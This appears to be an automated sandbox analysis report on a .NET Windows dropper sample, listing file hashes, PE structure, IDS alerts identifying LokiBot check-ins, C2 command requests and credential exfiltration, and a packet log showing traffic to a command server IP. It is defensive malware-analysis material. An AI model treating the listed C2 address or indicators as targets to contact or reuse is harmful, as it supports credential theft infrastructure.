Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	50
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	871BDD96B159C14D15C8D97D9111E9C8
SHA1:	8CD537A621659C289F0707BAD94719B5782DDB1F
SHA-256:	CC2786E1F9910A9D811400EDCDDAF7075195F7A16B216DCBEFBA3BC7C4F2AE51
SHA-512:	E116D2D486BC802E99D5FFE83A666D5E324887A65965C7E0D90B238A4EE1DB97E28F59AED23E6F968868902D762DF06146833BE62064C4A74D7C9384DFB0C7F6
Malicious:	false
Preview:	..................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.7691875294894785
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
File size:	313856
MD5:	3039fa7b347872c33c247581a27a7560
SHA1:	69832bbe446653f7d10eccf07069e73230138af8
SHA256:	f949fda96d4810c4ffa941ecce00160b984cf7ac32cf1ca88dd4dd9583f2e480
SHA512:	175e3f5c4bb39e490c2b25f02e623317923b02f976f7dfc029d0213ca5d3ef2b31deef01fd9a355fdf8d5eea826130e56e45723ab2004d3797de4e11cd4053d2
SSDEEP:	1536:rLc62Vr2beD+oPKjg7cMpdLVPZby1U/r3EVi6DXxhoa:12VCkVUXL
TLSH:	81648E9A9D721284F5154D33E5BBCBA8FB125EA427AD712B2E4C7530063317B2BAF131
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c............................v4... ...@....@.. ....................... ............`................................

File Icon


Icon Hash:	92b21472696d3916

Static PE Info

General

Entrypoint:	0x403476
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6385E7BE [Tue Nov 29 11:06:38 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x341c	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x4afcc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x50000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x147c	0x1600	False	0.5161576704545454	data	5.268731127158798	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x4afcc	0x4b000	False	0.050693359375	data	3.6559178414965716	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x50000	0xc	0x200	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x4220	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336
RT_ICON	0x46248	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896
RT_ICON	0x4a470	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600
RT_ICON	0x4ca18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224
RT_ICON	0x4dac0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400
RT_ICON	0x4e448	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088
RT_GROUP_ICON	0x4e8b0	0x5a	data
RT_VERSION	0x4e90c	0x4bc	data
RT_MANIFEST	0x4edc8	0x204	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (513), with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.7141.98.6.10249731802021641 11/29/22-16:52:33.757391	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249720802025381 11/29/22-16:52:28.227779	TCP	2025381	ET TROJAN LokiBot Checkin	49720	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249717802025381 11/29/22-16:52:26.668343	TCP	2025381	ET TROJAN LokiBot Checkin	49717	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249726802025381 11/29/22-16:52:31.339365	TCP	2025381	ET TROJAN LokiBot Checkin	49726	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249725802024313 11/29/22-16:52:30.920170	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49725	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249725802024318 11/29/22-16:52:30.920170	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49725	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249716802024317 11/29/22-16:52:25.029133	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49716	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249722802021641 11/29/22-16:52:29.504056	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49722	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249716802024312 11/29/22-16:52:25.029133	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49716	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249718802825766 11/29/22-16:52:27.285136	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49718	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249719802021641 11/29/22-16:52:27.785438	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49719	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249727802825766 11/29/22-16:52:31.817491	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49727	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249721802825766 11/29/22-16:52:28.704063	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49721	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249730802825766 11/29/22-16:52:33.273429	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49730	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249728802021641 11/29/22-16:52:32.198993	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49728	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249730802025381 11/29/22-16:52:33.273429	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249721802021641 11/29/22-16:52:28.704063	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49721	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249727802021641 11/29/22-16:52:31.817491	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49727	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249717802825766 11/29/22-16:52:26.668343	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49717	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249732802021641 11/29/22-16:52:36.325135	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.7	141.98.6.102
141.98.6.102192.168.2.780497182025483 11/29/22-16:52:27.393637	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49718	141.98.6.102	192.168.2.7
192.168.2.7141.98.6.10249718802025381 11/29/22-16:52:27.285136	TCP	2025381	ET TROJAN LokiBot Checkin	49718	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249728802825766 11/29/22-16:52:32.198993	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49728	80	192.168.2.7	141.98.6.102
141.98.6.102192.168.2.780497212025483 11/29/22-16:52:28.798694	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49721	141.98.6.102	192.168.2.7
141.98.6.102192.168.2.780497202025483 11/29/22-16:52:28.346106	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49720	141.98.6.102	192.168.2.7
192.168.2.7141.98.6.10249717802024312 11/29/22-16:52:26.668343	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49717	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249726802021641 11/29/22-16:52:31.339365	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49726	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249723802024318 11/29/22-16:52:30.023507	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49723	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249720802024318 11/29/22-16:52:28.227779	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49720	80	192.168.2.7	141.98.6.102
141.98.6.102192.168.2.780497242025483 11/29/22-16:52:30.593492	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49724	141.98.6.102	192.168.2.7
141.98.6.102192.168.2.780497252025483 11/29/22-16:52:31.018575	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49725	141.98.6.102	192.168.2.7
192.168.2.7141.98.6.10249731802025381 11/29/22-16:52:33.757391	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249722802025381 11/29/22-16:52:29.504056	TCP	2025381	ET TROJAN LokiBot Checkin	49722	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249717802024317 11/29/22-16:52:26.668343	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49717	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249723802024313 11/29/22-16:52:30.023507	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49723	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249716802025381 11/29/22-16:52:25.029133	TCP	2025381	ET TROJAN LokiBot Checkin	49716	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249719802025381 11/29/22-16:52:27.785438	TCP	2025381	ET TROJAN LokiBot Checkin	49719	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249720802024313 11/29/22-16:52:28.227779	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49720	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249725802025381 11/29/22-16:52:30.920170	TCP	2025381	ET TROJAN LokiBot Checkin	49725	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249726802825766 11/29/22-16:52:31.339365	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49726	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249718802021641 11/29/22-16:52:27.285136	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49718	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249732802825766 11/29/22-16:52:36.325135	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49732	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249727802025381 11/29/22-16:52:31.817491	TCP	2025381	ET TROJAN LokiBot Checkin	49727	80	192.168.2.7	141.98.6.102
141.98.6.102192.168.2.780497282025483 11/29/22-16:52:32.293466	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49728	141.98.6.102	192.168.2.7
192.168.2.7141.98.6.10249729802021641 11/29/22-16:52:32.689634	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49729	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249730802021641 11/29/22-16:52:33.273429	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249724802021641 11/29/22-16:52:30.488585	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49724	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249731802024313 11/29/22-16:52:33.757391	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49731	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249722802024318 11/29/22-16:52:29.504056	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49722	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249725802021641 11/29/22-16:52:30.920170	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49725	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249728802024318 11/29/22-16:52:32.198993	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49728	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249719802024318 11/29/22-16:52:27.785438	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49719	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249732802025381 11/29/22-16:52:36.325135	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249731802024318 11/29/22-16:52:33.757391	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49731	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249723802025381 11/29/22-16:52:30.023507	TCP	2025381	ET TROJAN LokiBot Checkin	49723	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249722802024313 11/29/22-16:52:29.504056	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49722	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249719802024313 11/29/22-16:52:27.785438	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49719	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249716802021641 11/29/22-16:52:25.029133	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49716	80	192.168.2.7	141.98.6.102
141.98.6.102192.168.2.780497312025483 11/29/22-16:52:33.852928	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49731	141.98.6.102	192.168.2.7
141.98.6.102192.168.2.780497302025483 11/29/22-16:52:33.400113	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49730	141.98.6.102	192.168.2.7
141.98.6.102192.168.2.780497322025483 11/29/22-16:52:36.428850	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49732	141.98.6.102	192.168.2.7
192.168.2.7141.98.6.10249728802024313 11/29/22-16:52:32.198993	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49728	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249724802825766 11/29/22-16:52:30.488585	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49724	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249729802825766 11/29/22-16:52:32.689634	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49729	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249727802024313 11/29/22-16:52:31.817491	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49727	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249723802825766 11/29/22-16:52:30.023507	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49723	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249721802024313 11/29/22-16:52:28.704063	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49721	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249724802025381 11/29/22-16:52:30.488585	TCP	2025381	ET TROJAN LokiBot Checkin	49724	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249721802024318 11/29/22-16:52:28.704063	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49721	80	192.168.2.7	141.98.6.102
141.98.6.102192.168.2.780497272025483 11/29/22-16:52:31.911870	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49727	141.98.6.102	192.168.2.7
141.98.6.102192.168.2.780497292025483 11/29/22-16:52:32.805162	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49729	141.98.6.102	192.168.2.7
192.168.2.7141.98.6.10249727802024318 11/29/22-16:52:31.817491	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49727	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249729802025381 11/29/22-16:52:32.689634	TCP	2025381	ET TROJAN LokiBot Checkin	49729	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249716802825766 11/29/22-16:52:25.029133	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49716	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249719802825766 11/29/22-16:52:27.785438	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49719	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249725802825766 11/29/22-16:52:30.920170	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49725	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249717802021641 11/29/22-16:52:26.668343	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49717	80	192.168.2.7	141.98.6.102
141.98.6.102192.168.2.780497222025483 11/29/22-16:52:29.613062	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49722	141.98.6.102	192.168.2.7
192.168.2.7141.98.6.10249726802024313 11/29/22-16:52:31.339365	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49726	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249722802825766 11/29/22-16:52:29.504056	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49722	80	192.168.2.7	141.98.6.102
141.98.6.102192.168.2.780497232025483 11/29/22-16:52:30.124555	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49723	141.98.6.102	192.168.2.7
141.98.6.102192.168.2.780497262025483 11/29/22-16:52:31.441372	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49726	141.98.6.102	192.168.2.7
192.168.2.7141.98.6.10249732802024313 11/29/22-16:52:36.325135	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249726802024318 11/29/22-16:52:31.339365	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49726	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249728802025381 11/29/22-16:52:32.198993	TCP	2025381	ET TROJAN LokiBot Checkin	49728	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249723802021641 11/29/22-16:52:30.023507	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49723	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249732802024318 11/29/22-16:52:36.325135	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249720802021641 11/29/22-16:52:28.227779	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49720	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249718802024318 11/29/22-16:52:27.285136	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49718	80	192.168.2.7	141.98.6.102
141.98.6.102192.168.2.780497192025483 11/29/22-16:52:27.888790	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49719	141.98.6.102	192.168.2.7
192.168.2.7141.98.6.10249729802024318 11/29/22-16:52:32.689634	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49729	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249731802825766 11/29/22-16:52:33.757391	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49731	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249729802024313 11/29/22-16:52:32.689634	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49729	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249730802024318 11/29/22-16:52:33.273429	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49730	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249730802024313 11/29/22-16:52:33.273429	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49730	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249721802025381 11/29/22-16:52:28.704063	TCP	2025381	ET TROJAN LokiBot Checkin	49721	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249724802024318 11/29/22-16:52:30.488585	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49724	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249718802024313 11/29/22-16:52:27.285136	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49718	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249720802825766 11/29/22-16:52:28.227779	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49720	80	192.168.2.7	141.98.6.102
192.168.2.7141.98.6.10249724802024313 11/29/22-16:52:30.488585	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49724	80	192.168.2.7	141.98.6.102

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 16:52:24.997996092 CET	49716	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:25.025604963 CET	80	49716	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:25.025755882 CET	49716	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:25.029133081 CET	49716	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:25.056865931 CET	80	49716	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:25.057019949 CET	49716	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:25.084474087 CET	80	49716	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:25.134174109 CET	80	49716	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:25.134202957 CET	80	49716	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:25.134368896 CET	49716	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:25.134368896 CET	49716	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:25.483601093 CET	49716	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:25.510782003 CET	80	49716	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:25.628839970 CET	49717	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:26.658721924 CET	80	49717	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:26.658849001 CET	49717	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:26.668343067 CET	49717	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:26.696173906 CET	80	49717	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:26.698062897 CET	49717	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:26.725455999 CET	80	49717	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:26.780868053 CET	80	49717	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:26.782255888 CET	49717	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:26.787746906 CET	80	49717	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:26.791439056 CET	49717	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:26.811738968 CET	80	49717	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.252202988 CET	49718	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.279365063 CET	80	49718	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.279613972 CET	49718	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.285135984 CET	49718	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.313250065 CET	80	49718	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.313807011 CET	49718	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.340986967 CET	80	49718	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.393636942 CET	80	49718	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.393665075 CET	80	49718	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.394037962 CET	49718	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.394037962 CET	49718	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.421232939 CET	80	49718	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.755188942 CET	49719	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.782188892 CET	80	49719	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.782548904 CET	49719	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.785438061 CET	49719	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.812939882 CET	80	49719	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.813057899 CET	49719	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.840610981 CET	80	49719	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.888789892 CET	80	49719	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.888820887 CET	80	49719	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:27.888894081 CET	49719	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.889062881 CET	49719	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:27.916518927 CET	80	49719	141.98.6.102	192.168.2.7
